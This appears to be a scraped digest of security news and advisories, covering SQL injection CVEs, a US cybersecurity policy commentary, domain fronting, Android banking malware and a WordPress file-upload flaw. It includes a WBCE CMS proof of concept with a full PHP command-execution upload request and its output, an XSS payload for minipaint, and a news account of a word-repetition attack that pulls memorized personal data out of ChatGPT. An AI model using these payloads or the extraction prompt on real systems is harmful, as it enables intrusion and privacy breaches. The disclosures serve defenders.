Senayan Library Management Systems (Slims) 9 Bulian v9.6.1 is vulnerable to SQL Injection via admin/modules/reporting/customs/fines_report.php.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48813: CVE-ID-not-yet/slims/slims9_bulian-9.6.1-SQLI-fines_report.md at main · komangsughosa/CVE-ID-not-yet

RuoYi up to v4.6 was discovered to contain a SQL injection vulnerability via /system/dept/edit.

**RuoYi vulnerable to SQL injection vulnerability**

High severity GitHub Reviewed Published Dec 1, 2023 to the GitHub Advisory Database • Updated Dec 1, 2023

GHSA-fg29-37px-c7wm: RuoYi vulnerable to SQL injection vulnerability

CVE-2023-49371: RuoYi-v4.6-vulnerability/Ruoyiv4.6.md at main · Maverickfir/RuoYi-v4.6-vulnerability

A more proactive approach to fighting cyberattacks for US companies and agencies is shaping up under the CISA's proposal to emphasize real-time attack detection and response.

Source: Wavebreakmedia Ltd IFE-210813 via Alamy Stock Photo

COMMENTARY

The United States faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies.

These attacks can have severe consequences, from the theft of sensitive information to the disruption of essential services. To effectively combat these threats, the US needs to adopt a comprehensive and proactive approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate.

Where are we now, and are we on the right track to adopt a similar mandate on this side of the Atlantic?

**The IT-SiG Approach Compared With the US's Current Capabilities**

One of the key features of the IT-SiG 2.0 mandate is its emphasis on real-time attack detection and response. This approach recognizes that preventing all cyberattacks is impossible and focuses on quickly identifying and mitigating the effects of successful attacks. This mitigation is achieved through advanced security technologies, such as intrusion-detection systems, security information and event management (SIEM) systems, and security orchestration, automation, and response (SOAR) systems, which can detect and respond to potential threats in near real time.

In contrast, the US has traditionally relied on patching vulnerabilities and responding to attacks after they have occurred and, ideally, been resolved. While this approach can effectively mitigate the effects of individual attacks, more is needed to keep pace with the rapidly evolving cyber-threat landscape. The US has needed a more proactive approach, like the IT-SiG 2.0 mandate, emphasizing real-time attack detection and response to stay ahead of potential threats.

**With This Strategy, Visibility Is Key**

Another critical aspect of the IT-SiG 2.0 mandate is its focus on improving visibility into the cybersecurity posture of organizations. Visibility is achieved through regular security assessments and penetration testing, which help identify vulnerabilities and weaknesses in an organization's systems and networks. By comprehensively understanding an organization's cybersecurity posture, the IT-SiG 2.0 mandate encourages organizations to identify issues and take steps to remediate them, improving overall security.

The United States has taken steps toward improving visibility into the cybersecurity posture of federal agencies with the Cybersecurity & Infrastructure Security Agency's Binding Operational Directive 23-01 in October 2022. However, this directive only applies to federal agencies and not to private-sector companies; many organizations may not have the same level of visibility into their cybersecurity posture as federal agencies.

According to Statista's Research Department, in the fiscal year 2020 the number of cybersecurity incident reports by federal agencies in the United States was over 30,000, around an 8% increase from the previous year.

To effectively combat cyber threats, it's essential that all organizations, not just federal agencies, have the necessary visibility into their cybersecurity posture. Therefore, the US should consider expanding the reach of Directive 23-01, like the IT-SiG 2.0 mandate, to include private-sector companies. This expansion would ensure that all organizations have visibility into their cybersecurity protection.

**Recent US Steps**

In brighter news, we might be beginning on the path toward a more effective national cybersecurity strategy akin to IT-SiG 2.0. In March, the Biden administration announced its National Cybersecurity Strategy. Among the plan's emphases are defending critical infrastructure; disrupting the ability for cybercriminals to attack agencies, organizations, and individuals; encouraging market forces to lead the way to broader security and resilience; and fostering international collaboration between private and public sectors to stay ahead of bad actors.

It appears the plan emphasizes less the cybersecurity tools that will be used and more the means of making sure they're being adopted and used correctly, shoring up weak links in complex business and government affairs. While the White House laid out this plan, a significant amount of the burden will fall on the shoulders of those most capable of fighting back against waves of cyberthreats — namely, the business world alongside the government. A redefinition of the "social contract" of cybersecurity seems to be what they're after here, with smaller businesses and individuals able to benefit from the processes put in place by larger organizations.

Taking up this plan and running with it, in August the Cybersecurity & Infrastructure Security Agency (CISA) released its Cybersecurity Strategic Plan for the fiscal years 2024 through 2026. "It's up to all of us, government and private sector, domestic and international, to execute \[the cybersecurity plan\]," Eric Goldstein, Executive Assistant Director for Cybersecurity wrote on the CISA website.

How does CISA's plan compare with IT-SiG 2.0? If we're going by real-time attack detection and visibility as the main driving points, then CISA's plan directly lines up, at least in concept. CISA's plan outlines three major goals: address immediate threats, harden the terrain, and drive security at scale.

So, visibility into vulnerabilities, quick real-time responses, and proactive mitigation of weaknesses that could be exploited are the primary focus. While this is still in plan form, it does seem like CISA has homed in on the same key points the IT-SiG 2.0 is going after.

**Looking Toward a More Secure Future**

Statista's Research Department found that in the first half of 2022, the number of data compromises in the US came in at 817 cases. Over 53 million individuals were affected by those data compromises, which included data breaches, data leakage, and data exposure.

The US faces an ever-growing threat of cyberattacks on its critical infrastructure, government agencies, and private sector companies. To effectively combat these threats, the United States needs to adopt a comprehensive and mandated approach to cybersecurity, similar to the one taken by Germany with its IT-SiG 2.0 mandate. This approach forces real-time attack detection and response, improves visibility into organizations' cybersecurity approach, and offers a solid beginning to a more secure digital world.

There's work to be done — by both government agencies and businesses, as the shift in the social contract implores everyone to do what they can — but by taking these first steps, the United States can improve its overall cybersecurity posture for all companies and better protect digital assets against potential threats.

**About the Author(s)**

CTO & Co-Founder, SecurityBridge

Ivan Mans is a long time SAP technology consultant, having worked in the SAP space since 1997 — the early days of R/3. In 2012, Ivan co-founded SecurityBridge, and in his current role as CTO, he is a motivated driver, inspires people, and pushes technology that contributes to the continuous innovation of the SecurityBridge Platform. In recent years, Ivan has been a regular speaker at SAP events, evangelizing SAP security.

The US Needs to Follow Germany's Attack-Detection Mandate

WBCE CMS version 1.6.1 suffers from a remote shell upload vulnerability.

# Exploit Title: WBCE CMS Version : 1.6.1  Remote Command Execution  
# Date: 30/11/2023  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip  
# Version: 1.6.1  
# Tested on: https://www.softaculous.com/apps/cms/WBCE_CMS

## POC:

1 ) Login with admin cred and click Add-ons  
2 ) Click on Language > Install Language  > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
3 ) Upload upgrade.php > <?php echo system('id'); ?> , click install > https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/install.php  
4 ) You will be see id command result 

Result: 

uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft) 

### Post Request:

POST /WBCE_CMSgn4fqnl8mv/admin/languages/install.php HTTP/1.1  
Host: demos6.softaculous.com  
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701347353.1.1.1701349000.0.0.0; _ga=GA1.1.1562523898.1701347353; AEFCookies1526[aefsid]=jefkds0yos40w5jpbhl6ue9tsbo2yhiq; demo_390=%7B%22sid%22%3A390%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22pass%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos4.softaculous.com%5C%2FImpressPagesgwupshhfxk%5C%2Fadmin.php%22%2C%22dir_suffix%22%3A%22gwupshhfxk%22%7D; demo_549=%7B%22sid%22%3A549%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos1.softaculous.com%5C%2FBluditbybuxqthew%5C%2Fadmin%5C%2F%22%2C%22dir_suffix%22%3A%22bybuxqthew%22%7D; demo_643=%7B%22sid%22%3A643%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%22%2C%22adminurl%22%3A%22https%3A%5C%2F%5C%2Fdemos6.softaculous.com%5C%2FWBCE_CMSgn4fqnl8mv%5C%2Fadmin%22%2C%22dir_suffix%22%3A%22gn4fqnl8mv%22%7D; phpsessid-5505-sid=576d8b8dd92f6cabe3a235cb359c9b34; WBCELastConnectJS=1701349503; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23  
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demos6.softaculous.com/WBCE_CMSgn4fqnl8mv/admin/languages/index.php  
Content-Type: multipart/form-data; boundary=---------------------------86020911415982314764024459  
Content-Length: 522  
Origin: https://demos6.softaculous.com  
Dnt: 1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="formtoken"

5d3c9cef-003aaa0a62e1196ebda16a7aab9a0cf881b9370c  
-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="userfile"; filename="upgrade.php"  
Content-Type: application/x-php

<?php echo system('id'); ?>

-----------------------------86020911415982314764024459  
Content-Disposition: form-data; name="submit"

-----------------------------86020911415982314764024459--

### Response : 



  
<div class="row" style="overflow:visible">  
<div class="fg12">  
<table id="former_positioning_table">  
<tr>  
    <td class="content">  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
uid=1000(soft) gid=1000(soft) groups=1000(soft)  
    <div class="top alertbox_error fg12 error-box">  
        <i class=" fa fa-2x fa-warning signal"></i>

                    <p>Invalid WBCE CMS language file. Please check the text file.</p>

                            <p><a href="index.php" class="button">Back

WBCE CMS 1.6.1 Shell Upload

Cross-site Scripting (XSS) - Reflected in GitHub repository viliusle/minipaint prior to 4.14.0.

Valid

Reported on

Mar 17th 2023

**Description**

Cross site scripting vulnerability in viliusle / minipaint in Layers name of "Edit Image"

**Proof of Concept**

1.  Go to the URL: https://viliusle.github.io/miniPaint/
2.  Go to the layers option and add new layer
3.  Rename Layer with payload.
4.  Popup will be there.

For more understanding please check POC. POC : https://drive.google.com/file/d/1etng0zEHk6xHTnr\_T6VkmM2l8AfBjdFs/view?usp=share\_link

var payload = "><img src=x onerror=alert(document.domain);>

**Impact**

An attacker can use XSS to send a malicious script to an unsuspecting user.

CVE-2023-6461: Cross Site Scripting (XSS) in Layers of Image  in minipaint

Domain fronting is a technique to hide the true origin of HTTPS requests by hiding the real domain name encrypted inside a legitimate TLS request.

Domain fronting is a technique of using different domain names on the same HTTPS connection. Put simply, domain fronting hides your traffic when connecting to a specific website. It routes traffic through a larger platform, masking the true destination in the process.

The technique became popular in the early 2010s in the mobile app development ecosystem, where developers would configure their apps to connect to a “front” domain that would then forward the connections to the developer’s backend. This way, the developer could expand their backend to deal with growing traffic and new features without constantly having to release app updates.

But as is true or many good things, it also comes with a flipside. Domain fronting allows malicious actors to use legitimate or high-reputation domains which will typically be on the allow-lists of defenders. The legitimate domains often belong to Content Delivery Networks (CDNs), but in recent years a number of large CDNs have blocked the method. The list includes Amazon (banned in 2018), Google (2018),  Microsoft (2022), and Cloudflare (2015).

A CDN is basically a large network of proxy servers and data centers and it can be used to host multiple domains. They are also known as content distribution networks. It’s what companies like Netflix use to deliver the requested content from a server near you.

For a “normal” connection to a website, a Domian Name System (DNS) finds the IP address for the requested domain name. As I explained in the blog DNS hijacks: what to look for, DNS is the phonebook of the internet to the effect that the input is a name and the output is a number. The number that belongs to what or who you want to reach.

With two domains hosted on the same CDN, HTTPS can be used to make it seem as though the user is connecting via a website that is unrestricted. HTTPS protocols are encrypted, so it can be used to discreetly connect to a different target domain. So an attacker can hide an HTTPS request to a restricted site inside a TLS connection to an allowed site.

In domain fronting, the process is the same but it will make an HTTPS request that appears to be from a different domain. It does so by mimicking the secondary domain’s DNS and TLS requests which makes it seem as though the user has connected from another domain. This method is popular as a means to evade online censorship and bypass restrictions.

The technique was adopted by online services like Tor, Telegram, and Signal to bypass internet censorship attempts in oppressive countries. When both Amazon and Google blocked domain fronting on their platforms, some suspected the Russian government was behind it because at the time, the Russian government blocked 1.8 million AWS and Google Cloud IP addresses in an attempt to frustrate access to Telegram’s instant messenger.

Because of the ability to hide backend infrastructure, domain fronting has also gained popularity within malware operations. They can use domain fronting to set up a command and control (C2) channel on a seemingly legitimate domain to bypass defensive techniques. The owners of good reputation sites cannot prevent their hostnames being abused for this activity.

The best defense against domain fronting in an enterprise organization is a cloud-based SWG (Secure Web Gateway) service with unlimited TLS interception capacity. A secure web gateway (SWG) is a network security technology that sits between users and the internet to filter traffic and enforce acceptable use and security policies. With an SWG or other tools with similar functionality, you can detect mismatches between the TLS Server Name Indication (SNI) and the HTTPS host header, and get a warning about domain fronting.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Explained: Domain fronting 

Apparently all it takes to get a chatbot to start spilling its secrets is prompting it to repeat certain words like "poem" forever.

Source: Ascannio via Shutterstock

Can getting ChatGPT to repeat the same word over and over again cause it to regurgitate large amounts of its training data, including personally identifiable information and other data scraped from the Web?

The answer is an emphatic yes, according to a team of researchers at Google DeepMind, Cornell University, and four other universities who tested the hugely popular generative AI chatbot's susceptibility to leaking data when prompted in a specific way.

**'Poem' as a Trigger Word**

In a report this week, the researchers described how they got ChatGPT to spew out memorized portions of its training data merely by prompting it to repeat words like "poem," "company," "send," "make," and "part" forever.

For example, when the researchers prompted ChatGPT to repeat the word "poem" forever, the chatbot initially responded by repeating the word as instructed. But after a few hundred times, ChatGPT began generating "often nonsensical" output, a small fraction of which included memorized training data such as an individual's email signature and personal contact information.

The researchers discovered that some words were better at getting the generative AI model to spill memorized data than others. For instance, prompting the chatbot to repeat the word "company" caused it to emit training data 164 times more often than other words, such as "know."

Data that the researchers were able to extract from ChatGPT in this manner included personally identifiable information on dozens of individuals; explicit content (when the researchers used an NSFW word as a prompt); verbatim paragraphs from books and poems (when the prompts contained the word "book" or "poem"); and URLs, unique user identifiers, bitcoin addresses, and programming code.

**A Potentially Big Privacy Issue?**

"Using only $200 USD worth of queries to ChatGPT (gpt-3.5-turbo), we are able to extract over 10,000 unique verbatim memorized training examples," the researchers wrote in their paper titled "Scalable Extraction of Training Data from (Production) Language Models."

"Our extrapolation to larger budgets suggests that dedicated adversaries could extract far more data," they wrote. The researchers estimated an adversary could extract 10 times more data with more queries.

Dark Reading's attempts to use some of the prompts in the study did not generate the output the researchers mentioned in their report. It's unclear if that's because ChatGPT creator OpenAI has addressed the underlying issues after the researchers disclosed their findings to the company in late August. OpenAI did not immediately respond to a Dark Reading request for comment.

The new research is the latest attempt to understand the privacy implications of developers using massive datasets scraped from different — and often not fully disclosed — sources to train their AI models.

Previous research has shown that large language models (LLMs) such as ChatGPT often can inadvertently memorize verbatim patterns and phrases in their training datasets. The tendency for such memorization increases with the size of the training data.

Researchers have shown how such memorized data is often discoverable in a model's output. Other researchers have shown how adversaries can use so-called divergence attacks to extract training data from an LLM. A divergence attack is one in which an adversary uses intentionally crafted prompts or inputs to get an LLM to generate outputs that diverge significantly from what it would typically produce.

In many of these studies, researchers have used open source models — where the training datasets and algorithms are known — to test the susceptibility of LLM to data memorization and leaks. The studies have also typically involved base AI models that have not been aligned to operate in a manner like an AI chatbot such as ChatGPT.

**A Divergence Attack on ChatGPT**

The latest study is an attempt to show how a divergence attack can work on a sophisticated closed, generative AI chatbot whose training data and algorithms remain mostly unknown. The study involved the researchers developing a way to get ChatGPT "to 'escape' out of its alignment training" and getting it to "behave like a base language model, outputting text in a typical Internet-text style." The prompting strategy they discovered (of getting ChatGPT to repeat the same word incessantly) caused precisely such an outcome, resulting in the model spewing out memorized data.

To verify that the data the model was generating was indeed training data, the researchers first built an auxiliary dataset containing some 9 terabytes of data from four of the largest LLM pre-training datasets — The Pile, RefinedWeb, RedPajama, and Dolma. They then compared the output data from ChatGPT against the auxiliary dataset and found numerous matches.

The researchers figured they were likely underestimating the extent of data memorization in ChatGPT because they were comparing the outputs of their prompting only against the 9-terabyte auxiliary dataset. So they took some 494 of ChatGPT's outputs from their prompts and manually searched for verbatim matches on Google. The exercise yielded 150 exact matches, compared to just 70 against the auxiliary dataset.

"We detect nearly twice as many model outputs are memorized in our manual search analysis than were detected in our (comparatively small)" auxiliary dataset, the researchers noted. "Our paper suggests that training data can easily be extracted from the best language models of the past few years through simple techniques."

The attack that the researchers described in their report is specific to ChatGPT and does not work against other LLMs. But the paper should help "warn practitioners that they should not train and deploy LLMs for any privacy-sensitive applications without extreme safeguards," they noted.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Simple Hacking Technique Can Extract ChatGPT Training Data

Cybersecurity researchers have disclosed a new sophisticated Android malware called FjordPhantom that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023.
"Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app

Mobile Security / Banking Security

Cybersecurity researchers have disclosed a new sophisticated Android malware called **FjordPhantom** that has been observed targeting users in Southeast Asian countries like Indonesia, Thailand, and Vietnam since early September 2023.

"Spreading primarily through messaging services, it combines app-based malware with social engineering to defraud banking customers," Oslo-based mobile app security firm Promon said in an analysis published Thursday.

Propagated mainly via email, SMS, and messaging apps, attack chains trick recipients into downloading a purported banking app that comes fitted with legitimate features but also incorporates rogue components.

Victims are then subjected to a social engineering technique akin to telephone-oriented attack delivery (TOAD), which involves calling a bogus call center to receive step-by-step instructions for running the app.

A key characteristic of the malware that sets it apart from other banking trojans of its kind is the use of virtualization to run malicious code in a container and fly under the radar.

The sneaky method, Promon said, breaks Android's sandbox protections as it allows different apps to be run on the same sandbox, enabling the malware to access sensitive data without requiring root access.

"Virtualization solutions like the one used by the malware can also be used to inject code into an application because the virtualization solution first loads its own code (and everything else found in its app) into a new process and then loads the code of the hosted application," security researcher Benjamin Adolphi said.

In the case of FjordPhantom, the host app downloaded includes a malicious module and the virtualization element that's then used to install and launch the embedded app of the targeted bank in a virtual container.

In other words, the bogus app is engineered to load the bank's legitimate app in a virtual container while also employing a hooking framework within the environment to alter the behavior of key APIs to grab sensitive information from the application's screen programmatically and close dialog boxes used to warn malicious activity on users' devices.

"FjordPhantom itself is written in a modular way to attack different banking apps," Adolphi said. "Depending on which banking app is embedded into the malware, it will perform various attacks on these apps."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New FjordPhantom Android Malware Targets Banking Apps in Southeast Asia

The Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'validate' function and insufficient blocklisting on the 'wpcf7_antiscript_file_name' function in versions up to, and including, 5.8.3. This makes it possible for authenticated attackers with editor-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed in most cases. By default, the file will be deleted from the server immediately. However, in some cases, other plugins may make it possible for the file to live on the server longer. This can make remote code execution possible when combined with another vulnerability, such as local file inclusion.

**Description**

The Contact Form 7 plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'validate' function and insufficient blocklisting on the 'wpcf7\_antiscript\_file\_name' function in versions up to, and including, 5.8.3. This makes it possible for authenticated attackers with editor-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed in most cases. By default, the file will be deleted from the server immediately. However, in some cases, other plugins may make it possible for the file to live on the server longer. This can make remote code execution possible when combined with another vulnerability, such as local file inclusion.

**References**

*   plugins.trac.wordpress.org
*   github.com
*   contactform7.com
*   plugins.trac.wordpress.org

**Share**

**1 affected software package**

Software Type

Plugin

Software Slug

contact-form-7 (view on wordpress.org)

Patched?

Yes

Remediation

Update to version 5.8.4, or a newer patched version

Affected Version

*   <= 5.8.3

Patched Version

*   5.8.4

This record contains material that is subject to copyright.

**Copyright 2012-2023 Defiant Inc.**

**License:** Defiant hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute this software vulnerability information. Any copy of the software vulnerability information you make for such purposes is authorized provided that you include a hyperlink to this vulnerability record and reproduce Defiant's copyright designation and this license in any such copy. **Read more.**

**Copyright 1999-2023 The MITRE Corporation**

**License:** CVE Usage: MITRE hereby grants you a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Common Vulnerabilities and Exposures (CVE®). Any copy you make for such purposes is authorized provided that you reproduce MITRE's copyright designation and this license in any such copy. **Read more.**

Have information to add, or spot any errors? Contact us at wfi-support@wordfence.com so we can make any appropriate adjustments.

Did you know Wordfence Intelligence provides free personal and commercial API access to our comprehensive WordPress vulnerability database, along with a free webhook integration to stay on top of the latest vulnerabilities added and updated in the database? Get started today!

Learn more

Want to get notified of the latest vulnerabilities that may affect your WordPress site?  
Install Wordfence on your site today to get notified immediately if your site is affected by a vulnerability that has been added to our database.

Get Wordfence

The Wordfence Intelligence WordPress vulnerability database is completely free to access and query via API. Please review the documentation on how to access and consume the vulnerability data via API.

Documentation

Tag

#git